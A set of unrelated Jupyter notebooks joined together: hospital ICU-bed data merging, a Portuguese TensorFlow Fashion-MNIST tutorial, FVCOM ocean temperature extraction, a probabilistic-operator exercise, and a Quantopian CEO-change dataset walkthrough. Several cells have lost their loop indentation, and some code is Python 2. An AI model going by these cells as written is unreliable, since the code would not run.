# PRVDR_NUM is read as str to preserve leading zeros in provider ids.
rpt = pd.read_csv('../source/cost_reports/2017/HOSP10FY2017/hosp10_2017_RPT.CSV', header=None, names=['RPT_REC_NUM',
                  'PRVDR_CTRL_TYPE_CD', 'PRVDR_NUM',
                  'Unknown','RPT_STUS_CD',
                  'FY_BGN_DATE', 'FY_END_DATE',
                  'PROC_DT',
                  'INITL_RPT_SW', 'LAST_RPT_SW',
                  'TRNSMTL_NUM', 'FI_NUM',
                  'ADR_VNDR_CD', 'FI_CREAT_DT',
                  'UTIL_CD',
                  'NPR_DT', 'SPEC_IND',
                  'FI_RCPT_DT'],
                  dtype={'PRVDR_NUM':str})
rpt.head()
```
Unfortunately, there are dupes! Hmmmm...
```
# Count reports per provider to check for duplicate provider numbers.
rpt.pivot_table(index='PRVDR_NUM', values='RPT_REC_NUM', aggfunc=len).sort_values(by='RPT_REC_NUM', ascending=False).head()
```
It turns out quite a few have ones from 2016, let's eliminate those?
```
# Fiscal-year-end year = last 4 characters of the FY_END_DATE string.
rpt['Year'] = rpt.FY_END_DATE.str[-4:]
rpt.head()
```
Pick the later of the two from each provider number
```
# Keep only the most recent report per provider number, then re-check
# that no provider appears more than once.
rpt_top = rpt.sort_values('Year',ascending = False).groupby('PRVDR_NUM').head(1)
rpt_top.pivot_table(index='PRVDR_NUM', values='RPT_REC_NUM', aggfunc=len).sort_values(by='RPT_REC_NUM', ascending=False).head()
```
Merging with the ICU beds dataset:
```
# Attach provider number / report status to each ICU-bed row; left join
# keeps every bed record even when the report row is missing.
icu_rpt = icu_beds.merge(rpt_top, on='RPT_REC_NUM', how='left')
icu_rpt.head()
icu_rpt.info()
```
**Next, adding name, characteristics etc. of each hospital to the dataset. This is based on the provider number.**
```
# Hospital Compare general info, keyed by Facility ID (= provider number).
hc = pd.read_csv('../source/hospital_compare/Hospital_General_Information.csv')
hc.head()
# Inner join: only hospitals present in both datasets are kept.
icu_info = icu_rpt.merge(hc, left_on='PRVDR_NUM', right_on='Facility ID')
icu_info.head()
icu_info.to_csv('processed/2017_ICU_beds.csv')
```
| github_jupyter |
##### Copyright 2018 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#@title MIT License
#
# Copyright (c) 2017 François Chollet
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
```
# Treine sua primeira rede neural: classificação básica
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://www.tensorflow.org/tutorials/keras/classification"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />Veja em TensorFlow.org</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/pt-br/tutorials/keras/classification.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Execute em Google Colab</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/docs-l10n/blob/master/site/pt-br/tutorials/keras/classification.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />Veja código fonte em GitHub</a>
</td>
<td>
<a href="https://storage.googleapis.com/tensorflow_docs/docs-l10n/site/pt-br/tutorials/keras/classification.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Baixe o notebook</a>
</td>
</table>
Note: A nossa comunidade TensorFlow traduziu estes documentos. Como as traduções da comunidade são *o melhor esforço*, não há garantias de que sejam uma reflexão exata e atualizada da [documentação oficial em Inglês](https://www.tensorflow.org/?hl=en). Se tem alguma sugestão para melhorar esta tradução, por favor envie um pull request para o repositório do GitHub [tensorflow/docs](https://github.com/tensorflow/docs). Para se voluntariar para escrever ou rever as traduções da comunidade, contacte a [lista docs@tensorflow.org](https://groups.google.com/a/tensorflow.org/forum/#!forum/docs).
Este tutorial treina um modelo de rede neural para classificação de imagens de roupas, como tênis e camisetas. Tudo bem se você não entender todos os detalhes; este é um visão geral de um programa do TensorFlow com detalhes explicados enquanto progredimos.
O guia usa [tf.keras](https://www.tensorflow.org/guide/keras), uma API alto-nível para construir e treinar modelos no TensorFlow.
```
# TensorFlow e tf.keras
import tensorflow as tf
from tensorflow import keras
# Librariesauxiliares
import numpy as np
import matplotlib.pyplot as plt
print(tf.__version__)
```
## Importe a base de dados Fashion MNIST
Esse tutorial usa a base de dados [Fashion MNIST](https://github.com/zalandoresearch/fashion-mnist) que contém 70,000 imagens em tons de cinza em 10 categorias. As imagens mostram artigos individuais de roupas com baixa resolução (28 por 28 pixels), como vemos aqui:
<table>
<tr><td>
<img src="https://tensorflow.org/images/fashion-mnist-sprite.png"
alt="Fashion MNIST sprite" width="600">
</td></tr>
<tr><td align="center">
<b>Figure 1.</b> <a href="https://github.com/zalandoresearch/fashion-mnist">Amostras de Fashion-MNIST</a> (por Zalando, MIT License).<br/>
</td></tr>
</table>
Fashion MNIST tem como intenção substituir a clássica base de dados [MNIST](http://yann.lecun.com/exdb/mnist/ )— frequentemente usada como "Hello, World" de programas de aprendizado de máquina (*machine learning*) para visão computacional. A base de dados MNIST contém imagens de dígitos escritos à mão (0, 1, 2, etc.) em um formato idêntico ao dos artigos de roupas que usaremos aqui.
Esse tutorial usa a Fashion MNIST para variar, e porque é um problema um pouco mais desafiador que o regular MNIST. Ambas bases são relativamente pequenas e são usadas para verificar se um algoritmo funciona como esperado. Elas são bons pontos de partida para testar e debugar código.
Usaremos 60,000 imagens para treinar nossa rede e 10,000 imagens para avaliar quão precisamente nossa rede aprendeu a classificar as imagens. Você pode acessar a Fashion MNIST diretamente do TensorFlow. Importe e carregue a base Fashion MNIST diretamente do TensorFlow:
```
# Download (on first use) and load the Fashion-MNIST train/test splits.
fashion_mnist = keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
```
Carregando a base de dados que retorna quatro NumPy arrays:
* Os *arrays* `train_images` e `train_labels` são o *conjunto de treinamento*— os dados do modelo usados para aprender.
* O modelo é testado com o *conjunto de teste*, os *arrays* `test_images` e `test_labels`.
As imagens são arrays NumPy de 28x28, com os valores des pixels entre 0 to 255. As *labels* (alvo da classificação) são um array de inteiros, no intervalo de 0 a 9. Esse corresponde com a classe de roupa que cada imagem representa:
<table>
<tr>
<th>Label</th>
<th>Classe</th>
</tr>
<tr>
<td>0</td>
<td>Camisetas/Top (T-shirt/top)</td>
</tr>
<tr>
<td>1</td>
<td>Calça (Trouser)</td>
</tr>
<tr>
<td>2</td>
<td>Suéter (Pullover)</td>
</tr>
<tr>
<td>3</td>
<td>Vestidos (Dress)</td>
</tr>
<tr>
<td>4</td>
<td>Casaco (Coat)</td>
</tr>
<tr>
<td>5</td>
<td>Sandálias (Sandal)</td>
</tr>
<tr>
<td>6</td>
<td>Camisas (Shirt)</td>
</tr>
<tr>
<td>7</td>
<td>Tênis (Sneaker)</td>
</tr>
<tr>
<td>8</td>
<td>Bolsa (Bag)</td>
</tr>
<tr>
<td>9</td>
<td>Botas (Ankle boot)</td>
</tr>
</table>
Cada imagem é mapeada com um só label. Já que o *nome das classes* não são incluídas na base de dados, armazene os dados aqui para usá-los mais tarde quando plotarmos as imagens:
```
# Human-readable class names, indexed by the integer labels 0-9.
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
               'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
```
## Explore os dados
Vamos explorar o formato da base de dados antes de treinar o modelo. O próximo comando mostra que existem 60000 imagens no conjunto de treinamento, e cada imagem é representada em 28 x 28 pixels:
```
train_images.shape
```
Do mesmo modo, existem 60000 labels no conjunto de treinamento:
```
len(train_labels)
```
Cada label é um inteiro entre 0 e 9:
```
train_labels
```
Existem 10000 imagens no conjunto de teste. Novamente, cada imagem é representada por 28 x 28 pixels:
```
test_images.shape
```
E um conjunto de teste contendo 10000 labels das imagens :
```
len(test_labels)
```
## Pré-processe os dados
Os dados precisam ser pré-processados antes de treinar a rede. Se você inspecionar a primeira imagem do conjunto de treinamento, você verá que os valores dos pixels estão entre 0 e 255:
```
# Inspect the first training image; pixel values lie in [0, 255].
plt.figure()
plt.imshow(train_images[0])
plt.colorbar()
plt.grid(False)
plt.show()
```
Escalaremos esses valores no intervalo de 0 e 1 antes de alimentar o modelo da rede neural. Para fazer isso, dividimos os valores por 255. É importante que o *conjunto de treinamento* e o *conjunto de teste* sejam pré-processados do mesmo modo:
```
train_images = train_images / 255.0
test_images = test_images / 255.0
```
Para verificar que os dados estão no formato correto e que estamos prontos para construir e treinar a rede, vamos mostrar as primeiras 25 imagens do *conjunto de treinamento* e mostrar o nome das classes de cada imagem abaixo.
```
plt.figure(figsize=(10,10))
for i in range(25):
plt.subplot(5,5,i+1)
plt.xticks([])
plt.yticks([])
plt.grid(False)
plt.imshow(train_images[i], cmap=plt.cm.binary)
plt.xlabel(class_names[train_labels[i]])
plt.show()
```
## Construindo o modelo
Construir a rede neural requer configurar as camadas do modelo, e depois, compilar o modelo.
### Montar as camadas
O principal bloco de construção da rede neural é a camada (*layer*). As camadas (*layers*) extraem representações dos dados inseridos na rede. Com sorte, essas representações são significativas para o problema à mão.
Muito do *deep learning* consiste encadear simples camadas. Muitas camadas, como `tf.keras.layers.Dense`, tem paramêtros que são aprendidos durante o treinamento.
```
# Sequential model: flatten the 28x28 image into a 784-vector, pass it
# through one fully connected ReLU layer, then a 10-way softmax that
# yields one probability per clothing class.
model = keras.Sequential([
keras.layers.Flatten(input_shape=(28, 28)),
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(10, activation='softmax')
])
```
A primeira camada da rede, `tf.keras.layers.Flatten`, transforma o formato da imagem de um array de duas dimensões (de 28 por 28 pixels) para um array de uma dimensão (de 28 * 28 = 784 pixels). Pense nessa camada como desempilhar as linhas de pixels da imagem e enfileirá-las. Essa camada não tem parâmetros para aprender; ela só reformata os dados.
Depois dos pixels serem achatados, a rede consiste de uma sequência de duas camadas `tf.keras.layers.Dense`. Essas são camadas neurais *densely connected*, ou *fully connected*. A primeira camada `Dense` tem 128 nós (ou neurônios). A segunda (e última) camada é uma *softmax* de 10 nós que retorna um array de 10 probabilidades, cuja soma resulta em 1. Cada nó contém um valor que indica a probabilidade de que aquela imagem pertença a uma das 10 classes.
### Compile o modelo
Antes do modelo estar pronto para o treinamento, é necessário algumas configurações a mais. Essas serão adicionadas no passo de *compilação*:
* *Função Loss* —Essa mede quão precisa o modelo é durante o treinamento. Queremos minimizar a função para *guiar* o modelo para direção certa.
* *Optimizer* —Isso é como o modelo se atualiza com base no dado que ele vê e sua função *loss*.
* *Métricas* —usadas para monitorar os passos de treinamento e teste. O exemplo abaixo usa a *acurácia*, a fração das imagens que foram classificadas corretamente.
```
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
```
## Treine o modelo
Treinar a rede neural requer os seguintes passos:
1. Alimente com os dados de treinamento, o modelo. Neste exemplo, os dados de treinamento são os arrays `train_images` e `train_labels`.
2. O modelo aprende como associar as imagens as *labels*.
3. Perguntamos ao modelo para fazer previsões sobre o conjunto de teste — nesse exemplo, o array `test_images`. Verificamos se as previsões combinaram com as *labels* do array `test_labels`.
Para começar a treinar, chame o método `model.fit`— assim chamado, porque ele "encaixa" o modelo no conjunto de treinamento:
```
model.fit(train_images, train_labels, epochs=10)
```
À medida que o modelo treina, as métricas loss e acurácia são mostradas. O modelo atinge uma acurácia de 0.88 (ou 88%) com o conjunto de treinamento.
## Avalie a acurácia
Depois, compare como o modelo performou com o conjunto de teste:
```
test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)
print('\nTest accuracy:', test_acc)
```
Acabou que a acurácia com o conjunto de teste é um pouco menor do que a acurácia de treinamento. Essa diferença entre as duas acurácias representa um *overfitting*. Overfitting é quando um modelo de aprendizado de máquina performa de maneira pior em um conjunto de entradas novas, não vistas anteriormente, do que no conjunto de treinamento.
## Faça predições
Com o modelo treinado, o usaremos para predições de algumas imagens.
```
predictions = model.predict(test_images)
```
Aqui, o modelo previu a *label* de cada imagem no conjunto de teste. Vamos olhar a primeira predição:
```
predictions[0]
```
A predição é um array de 10 números. Eles representam a *confiança* do modelo de que a imagem corresponde a cada um dos diferentes artigos de roupa. Podemos ver qual *label* tem o maior valor de confiança:
```
np.argmax(predictions[0])
```
Então, o modelo é confiante de que esse imagem é uma bota (ankle boot) ou `class_names[9]`. Examinando a label do teste, vemos que essa classificação é correta:
```
test_labels[0]
```
Podemos mostrar graficamente como se parece em um conjunto total de previsão de 10 classes.
```
def plot_image(i, predictions_array, true_label, img):
    """Show image i with an xlabel describing the model's prediction.

    The xlabel is blue when the predicted class matches the true class
    and red otherwise, and shows the predicted class name, the model's
    confidence (as a percentage), and the true class name.
    """
    probs, actual, image = predictions_array[i], true_label[i], img[i]
    plt.grid(False)
    plt.xticks([])
    plt.yticks([])
    plt.imshow(image, cmap=plt.cm.binary)
    guess = np.argmax(probs)
    color = 'blue' if guess == actual else 'red'
    plt.xlabel("{} {:2.0f}% ({})".format(class_names[guess],
                                         100*np.max(probs),
                                         class_names[actual]),
               color=color)
def plot_value_array(i, predictions_array, true_label):
    """Bar-plot the 10 class probabilities for sample i.

    The bar of the predicted class is painted red, the bar of the true
    class blue; when they coincide the blue (set last) wins.
    """
    probs, actual = predictions_array[i], true_label[i]
    plt.grid(False)
    plt.xticks([])
    plt.yticks([])
    bars = plt.bar(range(10), probs, color="#777777")
    plt.ylim([0, 1])
    bars[np.argmax(probs)].set_color('red')
    bars[actual].set_color('blue')
```
Vamos olhar a previsão imagem na posição 0, do array de predição.
```
i = 0
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
plt.show()
i = 12
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
plt.show()
```
Vamos plotar algumas das previsões do modelo. Labels preditas corretamente são azuis e as predições erradas são vermelhas. O número dá a porcentagem (de 100) da confiança na label predita. Note que o modelo pode errar mesmo estando confiante.
```
# Plota o primeiro X test images, e as labels preditas, e as labels verdadeiras.
# Colore as predições corretas de azul e as incorretas de vermelho.
num_rows = 5
num_cols = 3
num_images = num_rows*num_cols
plt.figure(figsize=(2*2*num_cols, 2*num_rows))
for i in range(num_images):
plt.subplot(num_rows, 2*num_cols, 2*i+1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(num_rows, 2*num_cols, 2*i+2)
plot_value_array(i, predictions, test_labels)
plt.show()
```
Finalmente, use o modelo treinado para fazer a predição de uma única imagem.
```
# Grab an image from the test dataset.
img = test_images[0]
print(img.shape)
```
Modelos `tf.keras` são otimizados para fazer predições em um *batch*, ou coleções, de exemplos de uma vez. De acordo, mesmo que usemos uma única imagem, precisamos adicionar em uma lista:
```
# Adiciona a imagem em um batch que possui um só membro.
img = (np.expand_dims(img,0))
print(img.shape)
```
Agora prediremos a label correta para essa imagem:
```
predictions_single = model.predict(img)
print(predictions_single)
plot_value_array(0, predictions_single, test_labels)
_ = plt.xticks(range(10), class_names, rotation=45)
```
`model.predict` retorna a lista de listas — uma lista para cada imagem em um *batch* de dados. Pegue a predição de nossa (única) imagem no *batch*:
```
np.argmax(predictions_single[0])
```
E, como antes, o modelo previu a label como 9.
| github_jupyter |
# Extract FVCOM time series from aggregated OPeNDAP endpoints
```
# Plot time series data from FVCOM model from list of lon,lat locations
# (uses the nearest point, no interpolation)
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import netCDF4
import datetime as dt
import pandas as pd
from StringIO import StringIO
# make dictionary of various model simulation endpoints
models={}
models['Massbay_forecast']='http://www.smast.umassd.edu:8080/thredds/dodsC/FVCOM/NECOFS/Forecasts/NECOFS_FVCOM_OCEAN_MASSBAY_FORECAST.nc'
models['GOM3_Forecast']='http://www.smast.umassd.edu:8080/thredds/dodsC/FVCOM/NECOFS/Forecasts/NECOFS_GOM3_FORECAST.nc'
models['Massbay_forecast_archive']='http://www.smast.umassd.edu:8080/thredds/dodsC/fvcom/archives/necofs_mb'
models['GOM3_30_year_hindcast']='http://www.smast.umassd.edu:8080/thredds/dodsC/fvcom/hindcasts/30yr_gom3'
def start_stop(url, tvar):
    """Print the first and last timestamps of a dataset's time variable.

    Parameters
    ----------
    url : str
        OPeNDAP endpoint (or local path) readable by netCDF4.Dataset.
    tvar : str
        Name of the time coordinate variable in the dataset.
    """
    nc = netCDF4.Dataset(url)
    try:
        time_var = nc.variables[tvar]
        first = netCDF4.num2date(time_var[0], time_var.units)
        last = netCDF4.num2date(time_var[-1], time_var.units)
        # print(...) with a single argument is valid in both Python 2 and 3
        # (the original py2-only print statements broke under Python 3).
        print(first.strftime('%Y-%b-%d %H:%M'))
        print(last.strftime('%Y-%b-%d %H:%M'))
    finally:
        nc.close()  # do not leak the (possibly remote) dataset handle
tvar = 'time'
for model,url in models.iteritems():
print model
try:
start_stop(url,tvar)
except:
print '[problem accessing data]'
#model='Massbay_forecast_archive'
model='Massbay_forecast'
#model='GOM3_Forecast'
#model='GOM3_30_year_hindcast'
url=models[model]
# Desired time for snapshot
# ....right now (or some number of hours from now) ...
start = dt.datetime.utcnow() - dt.timedelta(hours=72)
stop = dt.datetime.utcnow() + dt.timedelta(hours=72)
# ... or specific time (UTC)
#start = dt.datetime(2004,9,1,0,0,0)
#stop = dt.datetime(2004,11,1,0,0,0)
def dms2dd(d, m, s):
    """Convert degrees, minutes, seconds to decimal degrees."""
    minutes = m + s/60.
    return d + minutes/60.
dms2dd(41,33,15.7)
dms2dd(42,51,17.40)
-dms2dd(70,30,20.2)
-dms2dd(70,18,42.0)
x = '''
Station, Lat, Lon
Falmouth Harbor, 41.541575, -70.608020
Sage Lot Pond, 41.554361, -70.505611
'''
x = '''
Station, Lat, Lon
Boston, 42.368186, -71.047984
Carolyn Seep Spot, 39.8083, -69.5917
Falmouth Harbor, 41.541575, -70.608020
'''
# Enter desired (Station, Lat, Lon) values here:
x = '''
Station, Lat, Lon
Boston, 42.368186, -71.047984
Scituate Harbor, 42.199447, -70.720090
Scituate Beach, 42.209973, -70.724523
Falmouth Harbor, 41.541575, -70.608020
Marion, 41.689008, -70.746576
Marshfield, 42.108480, -70.648691
Provincetown, 42.042745, -70.171180
Sandwich, 41.767990, -70.466219
Hampton Bay, 42.900103, -70.818510
Gloucester, 42.610253, -70.660570
'''
x = '''
Station, Lat, Lon
Buoy A, 42.52280, -70.56535
Buoy B, 43.18089, -70.42788
Nets, 42.85483, -70.3116
DITP, 42.347 , -70.960
'''
# Create a Pandas DataFrame
obs=pd.read_csv(StringIO(x.strip()), sep=",\s*",index_col='Station',engine='python')
obs
# find the indices of the points in (x,y) closest to the points in (xi,yi)
def nearxy(x, y, xi, yi):
    """For each query point (xi[k], yi[k]), return the index of the
    nearest point in (x, y).

    Brute-force Euclidean nearest neighbour; ties resolve to the first
    occurrence (argmin semantics). No interpolation is performed.
    """
    indices = np.ones(len(xi), dtype=int)
    for k in range(len(xi)):
        distances = np.sqrt((x - xi[k])**2 + (y - yi[k])**2)
        indices[k] = distances.argmin()
    return indices
nc=netCDF4.Dataset(url)
# open NECOFS remote OPeNDAP dataset
ncv = nc.variables
# find closest NECOFS nodes to station locations
obs['0-Based Index'] = nearxy(ncv['lon'][:],ncv['lat'][:],obs['Lon'],obs['Lat'])
obs
ncv['lon'][0:10]
# get time values and convert to datetime objects
time_var = ncv['time']
istart = netCDF4.date2index(start,time_var,select='nearest')
istop = netCDF4.date2index(stop,time_var,select='nearest')
jd = netCDF4.num2date(time_var[istart:istop],time_var.units)
# get all time steps of water level from each station
# NOTE: this takes a while....
nsta=len(obs)
z = np.ones((len(jd),nsta))
layer = 0 # surface layer =0, bottom layer=-1
for i in range(nsta):
z[:,i] = ncv['temp'][istart:istop,layer,obs['0-Based Index'][i]]
# make a DataFrame out of the interpolated time series at each location
zvals=pd.DataFrame(z*9./5.+32.,index=jd,columns=obs.index)
# list out a few values
zvals.head()
# plotting at DataFrame is easy!
ax=zvals.plot(figsize=(16,4),grid=True,
title=('NECOFS Forecast Bottom Water Temperature from %s Grid' % model),legend=False);
# read units from dataset for ylabel
plt.ylabel(ncv['temp'].units)
# plotting the legend outside the axis is a bit tricky
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5));
# make a new DataFrame of maximum water levels at all stations
b=pd.DataFrame(zvals.idxmax(),columns=['time of max water temp (UTC)'])
# create heading for new column containing max water level
zmax_heading='tmax (%s)' % ncv['temp'].units
# Add new column to DataFrame
b[zmax_heading]=zvals.max()
b
```
| github_jupyter |
<table width="100%"> <tr>
<td style="background-color:#ffffff;">
<a href="http://qworld.lu.lv" target="_blank"><img src="..\images\qworld.jpg" width="35%" align="left"> </a></td>
<td style="background-color:#ffffff;vertical-align:bottom;text-align:right;">
prepared by Abuzer Yakaryilmaz (<a href="http://qworld.lu.lv/index.php/qlatvia/" target="_blank">QLatvia</a>)
<br>
updated by Özlem Salehi | December 1, 2019
</td>
</tr></table>
<table width="100%"><tr><td style="color:#bbbbbb;background-color:#ffffff;font-size:11px;font-style:italic;text-align:right;">This cell contains some macros. If there is a problem with displaying mathematical formulas, please run this cell to load these macros. </td></tr></table>
$ \newcommand{\bra}[1]{\langle #1|} $
$ \newcommand{\ket}[1]{|#1\rangle} $
$ \newcommand{\braket}[2]{\langle #1|#2\rangle} $
$ \newcommand{\dot}[2]{ #1 \cdot #2} $
$ \newcommand{\biginner}[2]{\left\langle #1,#2\right\rangle} $
$ \newcommand{\mymatrix}[2]{\left( \begin{array}{#1} #2\end{array} \right)} $
$ \newcommand{\myvector}[1]{\mymatrix{c}{#1}} $
$ \newcommand{\myrvector}[1]{\mymatrix{r}{#1}} $
$ \newcommand{\mypar}[1]{\left( #1 \right)} $
$ \newcommand{\mybigpar}[1]{ \Big( #1 \Big)} $
$ \newcommand{\sqrttwo}{\frac{1}{\sqrt{2}}} $
$ \newcommand{\dsqrttwo}{\dfrac{1}{\sqrt{2}}} $
$ \newcommand{\onehalf}{\frac{1}{2}} $
$ \newcommand{\donehalf}{\dfrac{1}{2}} $
$ \newcommand{\hadamard}{ \mymatrix{rr}{ \sqrttwo & \sqrttwo \\ \sqrttwo & -\sqrttwo }} $
$ \newcommand{\vzero}{\myvector{1\\0}} $
$ \newcommand{\vone}{\myvector{0\\1}} $
$ \newcommand{\vhadamardzero}{\myvector{ \sqrttwo \\ \sqrttwo } } $
$ \newcommand{\vhadamardone}{ \myrvector{ \sqrttwo \\ -\sqrttwo } } $
$ \newcommand{\myarray}[2]{ \begin{array}{#1}#2\end{array}} $
$ \newcommand{\X}{ \mymatrix{cc}{0 & 1 \\ 1 & 0} } $
$ \newcommand{\Z}{ \mymatrix{rr}{1 & 0 \\ 0 & -1} } $
$ \newcommand{\Htwo}{ \mymatrix{rrrr}{ \frac{1}{2} & \frac{1}{2} & \frac{1}{2} & \frac{1}{2} \\ \frac{1}{2} & -\frac{1}{2} & \frac{1}{2} & -\frac{1}{2} \\ \frac{1}{2} & \frac{1}{2} & -\frac{1}{2} & -\frac{1}{2} \\ \frac{1}{2} & -\frac{1}{2} & -\frac{1}{2} & \frac{1}{2} } } $
$ \newcommand{\CNOT}{ \mymatrix{cccc}{1 & 0 & 0 & 0 \\ 0 & 1 & 0 & 0 \\ 0 & 0 & 0 & 1 \\ 0 & 0 & 1 & 0} } $
$ \newcommand{\norm}[1]{ \left\lVert #1 \right\rVert } $
<h2> <font color="blue"> Solutions for </font>Probabilistic Operators</h2>
<a id="task3"></a>
<h3>Task 3</h3>
What is the new probabilistic state if the operator $ B = \mymatrix{ccc}{ 0.4 & 0.6 & 0 \\ 0.2 & 0.1 & 0.7 \\ 0.4 & 0.3 & 0.3 } $ is applied to the state $ \myvector{ 0.1 \\ 0.3 \\ 0.6 } $.
Please find the result by using matrix-vector multiplication.
Please do not use any python library for matrix-vector multiplication.
<i> The new probabilistic state should be $ \myvector{0.22 \\ 0.47 \\ 0.31} $. </i>
<h3>Solution</h3>
```
# operator B: a 3x3 column-stochastic matrix (each column sums to 1)
B = [
    [0.4, 0.6, 0],
    [0.2, 0.1, 0.7],
    [0.4, 0.3, 0.3]
]

# the current probabilistic state
v = [0.1, 0.3, 0.6]

# matrix-vector multiplication by hand:
# newstate[j] = sum over i of B[j][i] * v[i]
newstate = [sum(entry * amp for entry, amp in zip(row, v)) for row in B]
print(newstate)
# operator B, this time as a numpy matrix (same check as the manual loop)
import numpy as np
# NOTE(review): np.matrix is deprecated in favor of plain ndarrays with
# the @ operator; kept as-is here to preserve this cell's printed output.
B =np.matrix([
[0.4,0.6,0],
[0.2,0.1,0.7],
[0.4,0.3,0.3]
])
# the current state as a 1x3 row vector; transposed below to a column
v =np.matrix( [0.1,0.3,0.6])
# B * v^T yields the new probabilistic state as a 3x1 column vector
print(B*v.transpose())
```
| github_jupyter |
# EventVestor: CEO Changes
In this notebook, we'll take a look at EventVestor's *CEO Changes* dataset, available on the [Quantopian Store](https://www.quantopian.com/store). This dataset spans January 01, 2007 through the current day.
### Blaze
Before we dig into the data, we want to tell you about how you generally access Quantopian Store data sets. These datasets are available through an API service known as [Blaze](http://blaze.pydata.org). Blaze provides the Quantopian user with a convenient interface to access very large datasets.
Blaze provides an important function for accessing these datasets. Some of these sets are many millions of records. Bringing that data directly into Quantopian Research directly just is not viable. So Blaze allows us to provide a simple querying interface and shift the burden over to the server side.
It is common to use Blaze to reduce your dataset in size, convert it over to Pandas and then to use Pandas for further computation, manipulation and visualization.
Helpful links:
* [Query building for Blaze](http://blaze.pydata.org/en/latest/queries.html)
* [Pandas-to-Blaze dictionary](http://blaze.pydata.org/en/latest/rosetta-pandas.html)
* [SQL-to-Blaze dictionary](http://blaze.pydata.org/en/latest/rosetta-sql.html).
Once you've limited the size of your Blaze object, you can convert it to a Pandas DataFrames using:
> `from odo import odo`
> `odo(expr, pandas.DataFrame)`
### Free samples and limits
One other key caveat: we limit the number of results returned from any given expression to 10,000 to protect against runaway memory usage. To be clear, you have access to all the data server side. We are limiting the size of the responses back from Blaze.
There is a *free* version of this dataset as well as a paid one. The free one includes about three years of historical data, though not up to the current day.
With preamble in place, let's get started:
```
# import the dataset
from quantopian.interactive.data.eventvestor import ceo_change
# or if you want to import the free dataset, use:
# from quantopian.data.eventvestor import ceo_change_free
# import data operations
from odo import odo
# import other libraries we will use
import pandas as pd
# Let's use blaze to understand the data a bit using Blaze dshape()
ceo_change.dshape
# And how many rows are there?
# N.B. we're using a Blaze function to do this, not len()
ceo_change.count()
# Let's see what the data looks like. We'll grab the first three rows.
ceo_change[:3]
```
Let's go over the columns:
- **event_id**: the unique identifier for this CEO Change.
- **asof_date**: EventVestor's timestamp of event capture.
- **trade_date**: for event announcements made before trading ends, trade_date is the same as event_date. For announcements issued after market close, trade_date is next market open day.
- **symbol**: stock ticker symbol of the affected company.
- **event_type**: this should always be *CEO Change*.
- **event_headline**: a short description of the event.
- **change_status**: indicates whether the change is a proposal or a confirmation.
- **change_scenario**: indicates if the CEO Change is *in*, *out*, or both.
- **change_type**: indicates if the incoming CEO is interim or permanent.
- **change_source**: is the incoming CEO an internal candidate, or recruited from the outside?
- **change_reason**: reason for the CEO transition
- **in_ceoname**: name of the incoming CEO
- **in_ceogender**: gender of the incoming CEO
- **out_ceoname**: name of the outgoing CEO
- **out_ceogender**: gender of the outgoing CEO
- **effective_date**: date as of which the CEO change is effective.
- **event_rating**: this is always 1. The meaning of this is uncertain.
- **timestamp**: this is our timestamp on when we registered the data.
- **sid**: the equity's unique identifier. Use this instead of the symbol.
We've done much of the data processing for you. Fields like `timestamp` and `sid` are standardized across all our Store Datasets, so the datasets are easy to combine. We have standardized the `sid` across all our equity databases.
We can select columns and rows with ease. Below, we'll fetch all entries for Microsoft. We're really only interested in the CEO coming in, the CEO going out, and the date, so we'll display only those columns.
```
# get the sid for MSFT
symbols('MSFT')
# knowing that the MSFT sid is 5061:
msft = ceo_change[ceo_change.sid==5061][['timestamp','in_ceoname', 'out_ceoname','change_status']].sort('timestamp')
msft
```
Note that the `in_ceoname` and `out_ceoname` in these cases were NaNs because there was a long transition period. Steve Ballmer announced his resignation on 2013-08-24, and formally stepped down on 2014-02-05.
Let's try another one:
```
# get the sid for AMD
sid_amd = symbols('AMD').sid
